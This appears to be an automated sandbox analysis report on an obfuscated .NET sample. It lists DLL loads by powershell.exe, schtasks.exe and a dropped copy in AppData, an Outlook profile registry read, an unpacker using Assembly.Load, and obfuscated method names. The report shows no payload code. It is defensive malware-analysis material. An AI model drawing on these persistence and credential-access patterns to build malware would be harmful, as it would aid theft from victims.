Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.file.exe.6b80000.5.raw.unpack, TLLCCEdYsihF24ts6B.cs	.Net Code: cXTGuykCBp System.Reflection.Assembly.Load(byte[])
Source: 4.2.file.exe.38e3958.2.raw.unpack, TLLCCEdYsihF24ts6B.cs	.Net Code: cXTGuykCBp System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B93064 push ss; ret	4_2_04B952E6
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9D470 push ebx; ret	4_2_04B9D47E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9F560 push esp; ret	4_2_04B9F56E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B950A9 push ss; ret	4_2_04B950AE
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9F190 pushad ; ret	4_2_04B9F19E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B98220 push eax; mov dword ptr [esp], ecx	4_2_04B98224
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9D211 push eax; ret	4_2_04B9D21E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B98210 push eax; mov dword ptr [esp], ecx	4_2_04B98224
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9F209 push ebp; ret	4_2_04B9F216
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9F3CF push esp; ret	4_2_04B9F3E6
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9D330 push eax; ret	4_2_04B9D33E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B98D01 push eax; ret	4_2_04B98D33
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9DE30 push esp; ret	4_2_04B9DE39
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B94E20 push cs; ret	4_2_04B94E26
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9EFF1 pushad ; ret	4_2_04B9EFFE
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9EA19 push ebp; ret	4_2_04B9EA26
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9DA10 push eax; ret	4_2_04B9DA1E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_04B9EB77 push ebp; ret	4_2_04B9EB86
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0684965F push eax; ret	4_2_0684966E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_06849730 push eax; ret	4_2_0684975E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0684E18A push eax; retf	4_2_0684E1A9
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0684F8E0 push edi; iretd	4_2_0684F8E6
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_077A6661 push dword ptr [edi+08418B06h]; ret	4_2_077A6673
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B34F978 push es; ret	4_2_0B34F987
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B3495A0 push es; ret	4_2_0B3495AE
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B3495DB push es; ret	4_2_0B3495E6
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B3F213F push es; ret	4_2_0B3F215E
Source: C:\Users\user\Desktop\file.exe	Code function: 4_2_0B3F2130 push es; ret	4_2_0B3F215E
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05962EFB pushad ; iretd	14_2_05962F01
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05962890 push eax; retf	14_2_05962891
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4DA21 push esp; iretd	14_2_06A4DA35

Source: file.exe	Static PE information: section name: .text entropy: 7.595806466843068
Source: rXcourOVPD.exe.4.dr	Static PE information: section name: .text entropy: 7.595806466843068

Source: 4.2.file.exe.6b80000.5.raw.unpack, f2bIYw5HsYatqje517.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vOcBW482my', 'BswBDXLDQs', 'MUgBztGMWj', 'QVP9Rv8cOH', 'gyE9URdmUo', 'akI9B2hWtN', 'kQQ990G6um', 'IhIZlVDaCViN61ZRAND'
Source: 4.2.file.exe.6b80000.5.raw.unpack, TLLCCEdYsihF24ts6B.cs	High entropy of concatenated method names: 'rwk9vxgDYI', 'efK9buOLdt', 'ph99TMQtUf', 'J9h95XNyMK', 'o7T9KvniEF', 'Nkk96DnLWY', 'zIi9ifk7rm', 'ufc9d6uIMy', 'Y0E9ArjySW', 'dMT9HkJuBR'
Source: 4.2.file.exe.6b80000.5.raw.unpack, WXQhAuTtwVUMKNvKl0.cs	High entropy of concatenated method names: 'Dispose', 'tohUWFxhA1', 'h2VBqlhHAE', 'r7UDktkXVS', 'SmiUDsm7mK', 'nAZUzVP9Eu', 'ProcessDialogKey', 'Y7bBRPgQQj', 'PWNBUJgZKm', 'OvfBBIikgd'
Source: 4.2.file.exe.6b80000.5.raw.unpack, aD3FN2Fse7siwHW4tW.cs	High entropy of concatenated method names: 'elWibIcqTB', 'gpli53ToUr', 'orei6u96Ag', 'o886DdrlUt', 'Goy6zPQaCV', 'pUciRSpdDP', 'gbJiUNX9fP', 'HoAiBjuxPl', 'RsXi9RTywQ', 'o8CiG1rbJk'
Source: 4.2.file.exe.6b80000.5.raw.unpack, H1wHKjUG7C2enf6PVRU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BEf3nDXkex', 'JXf3Qjs8tt', 'iNK3SZKRP8', 'dxa3379yvC', 'xDZ3xen5lM', 'BTk3hjL3iF', 'BdV3yFBpiU'
Source: 4.2.file.exe.6b80000.5.raw.unpack, DikgdCDkjxIte2PlHA.cs	High entropy of concatenated method names: 'aKZQ5BH09l', 'z1MQKX7PC7', 'wpqQ6JFnhp', 'Dk5QiPNB12', 'm67QnngKeX', 'n7GQdmLCVY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 4.2.file.exe.6b80000.5.raw.unpack, YKaaB7sFnGxbxImEpX.cs	High entropy of concatenated method names: 'Rd5KLWbMGU', 'SeKKor1jA9', 'svT5cwEIu5', 'ePQ5rO0j00', 'MaK5EnBExi', 'pBx54Cuu6k', 'lTB5FWTRc6', 'xRW5ks4jX2', 'IpW5wbXKVH', 'pCl58QnJaH'
Source: 4.2.file.exe.6b80000.5.raw.unpack, ejZIv3204H9gEM16dT.cs	High entropy of concatenated method names: 'zgUp84NEvi', 'Bh2pjF2GwB', 'KQkp2LGQoO', 'KYApM0pPIj', 'Bqfpq55uDo', 'J9vpcd9J8k', 'kavprkWBHd', 'Ah3pEl0pIw', 'a7xp4bYg4l', 'ytmpFP10Nd'
Source: 4.2.file.exe.6b80000.5.raw.unpack, Clabo97eqthAWGxWJ3.cs	High entropy of concatenated method names: 'klJ5JE660y', 'L7t5ZD8JDd', 'MIl5IlCAs8', 'qTW57ZCC17', 'MHd5pPcxNQ', 'HZA5esIYjg', 'vU95aB8eIm', 'sZw5l6hokB', 'TrQ5nfqBT1', 'F1F5QdU8En'
Source: 4.2.file.exe.6b80000.5.raw.unpack, fPgQQjWjWNJgZKmmvf.cs	High entropy of concatenated method names: 'f6unXMGCpb', 'scwnqTrwjp', 'CtrncYRQNK', 'LvAnrBP5qp', 'NuTnEC91R3', 'ymxn4Yn7FN', 'SeRnFa6VLI', 'V9WnkN9kZG', 'yQRnwVuxyh', 'zeMn81gl2Q'
Source: 4.2.file.exe.6b80000.5.raw.unpack, afGEjvURtp2vPLdIck5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SaJQmG0UPF', 'zX6QjRQPdA', 'wkTQtLgP4n', 'M97Q2scW3P', 'yEeQMFBRlO', 'AGmQVAFXA2', 'P88QCQbXTg'
Source: 4.2.file.exe.6b80000.5.raw.unpack, DAU8UcGBhxVOQThrt9.cs	High entropy of concatenated method names: 'OlqUiu3Lcc', 'gshUdv3oFD', 'deqUHthAWG', 'vWJUP3DKaa', 'DmEUppXJdP', 'udDUe1HF84', 'hNsYoKNjxgswTbOBb8', 'MjYpE7BfDyWwG9MUWd', 'loAUUC1Hv3', 'vK7U9idPiN'
Source: 4.2.file.exe.6b80000.5.raw.unpack, rqsGGKqqiMvyjqsarR.cs	High entropy of concatenated method names: 'rIr1S8X6WdKukH9IghR', 'mXIpxsXS9R6HbPjjOE2', 'SyE6lSafZU', 'pKP6nbg3yK', 'AwE6QLMURO', 'nIvQl3X9DeEKFWdu4Wm', 'rAk89UXyxYthlNoB5Js'
Source: 4.2.file.exe.6b80000.5.raw.unpack, AdP3dDX1HF845moAt1.cs	High entropy of concatenated method names: 'W7a6v02nar', 'G8K6TVA7xb', 'U5G6K3gaP5', 'mlK6iW1tnj', 'G6J6ddL1Jl', 'kRxKfqPDIJ', 'dWqK0eIWDG', 'MSkKNAy1CR', 'lFgKOd3SEB', 'VhjKWPmtrr'
Source: 4.2.file.exe.6b80000.5.raw.unpack, wJScZWV5dIbfbnZf6F.cs	High entropy of concatenated method names: 'ToString', 'uq4emPVxi8', 'MxXeq9Y68P', 'bqmec0Ur0b', 'QBjer45b81', 'WE3eEDh4bo', 'sIfe44KBek', 'jFMeFnHdlu', 'eBRekfqAT7', 'dywewk8OZi'
Source: 4.2.file.exe.6b80000.5.raw.unpack, lPmUAfzqLScwnGQDWH.cs	High entropy of concatenated method names: 'GDJQZKDFOD', 'BpTQIjSpSZ', 'Aq2Q71PAWs', 'bw9QXZgOHM', 'aVFQqx9XRN', 'K3cQrycfD3', 'cHqQE06Sxb', 'HOdQygyPFr', 'PitQ1i1R6s', 'FWEQYW4mAl'
Source: 4.2.file.exe.6b80000.5.raw.unpack, TlidgCUUD0JX3EXUMrO.cs	High entropy of concatenated method names: 'SGgQDmUhGQ', 'FpjQzE1YYS', 'cTgSR44xqp', 'yEgSUShtJ8', 'UG1SBU4pSa', 'wyGS91wdFd', 'Dy8SG7oYKb', 'IDTSvsoiJQ', 'loaSbT5Hv6', 'gHPST6rGmy'
Source: 4.2.file.exe.6b80000.5.raw.unpack, Gu3LccITshv3oFDMFh.cs	High entropy of concatenated method names: 'bjdT26vupF', 'onGTMZk25O', 'H8RTVS5c6B', 'Eq9TCry0Gw', 'UrRTfwZJyZ', 'BSjT0f7yiN', 'dbHTNkr1yj', 'sHkTOytoN2', 'aNOTWSPDge', 'bIPTDmQ56A'
Source: 4.2.file.exe.6b80000.5.raw.unpack, CR3bRGBCAmZgaoaiBv.cs	High entropy of concatenated method names: 'UoDuNy0lO', 'IAHJWf8HZ', 'GYvZmSLPC', 'dPRoEkR4n', 'cb37BrdWR', 'yeis8DD8i', 'EVjAhIU9IPwtyZCmbJ', 'lPwWLtPb22pUHUbsfm', 'Pp1lP0MNH', 'vPkQvP6KS'
Source: 4.2.file.exe.6b80000.5.raw.unpack, XSXCsxt8MVV4UfkZJI.cs	High entropy of concatenated method names: 'WvkgIaQaIV', 'cHWg7NGqHW', 'ELhgXTKWEU', 'BbHgqvMgWk', 'z3igreS2OU', 'R9agEnlPRS', 'RlogFDeOFP', 'op7gkrjXfO', 'o6sg8VwNyo', 'h2wgmsuoFK'
Source: 4.2.file.exe.6b80000.5.raw.unpack, dab2jcN1RSohFxhA1V.cs	High entropy of concatenated method names: 'ayhnp6aoDY', 'ru8naPVIiD', 'fg9nnapXAb', 'tOlnSxbmqb', 'hRvnxnlroo', 'zdFnychQ2n', 'Dispose', 'tShlbfrIu7', 'hZxlTgmP2c', 'fSgl5vdmAO'
Source: 4.2.file.exe.6b80000.5.raw.unpack, vAa5gWwrVs4mA315dh.cs	High entropy of concatenated method names: 'sIqi1QwF6b', 'DFjiYdJthP', 'p5RiucQWeE', 'GStiJyYlOy', 'G99iLmO2Yh', 'Tc8iZHyW04', 'l2hioj3Y0x', 'VUtiItlRbN', 'Iufi7E8evp', 'ivOisKPtxL'
Source: 4.2.file.exe.6b80000.5.raw.unpack, pg1UhnUByfQeqNVmatA.cs	High entropy of concatenated method names: 'ToString', 'PpiSIu1QY4', 'EcGS79IBuB', 'heOSs3yqi8', 'uSJSXB585Z', 'lEQSq7LHKy', 'KS3Sc6qjDS', 'MRUSrwLUpF', 't1iCnHaexdXkUWqWis1', 'jYxv1faFJ1mrTEtXeiw'
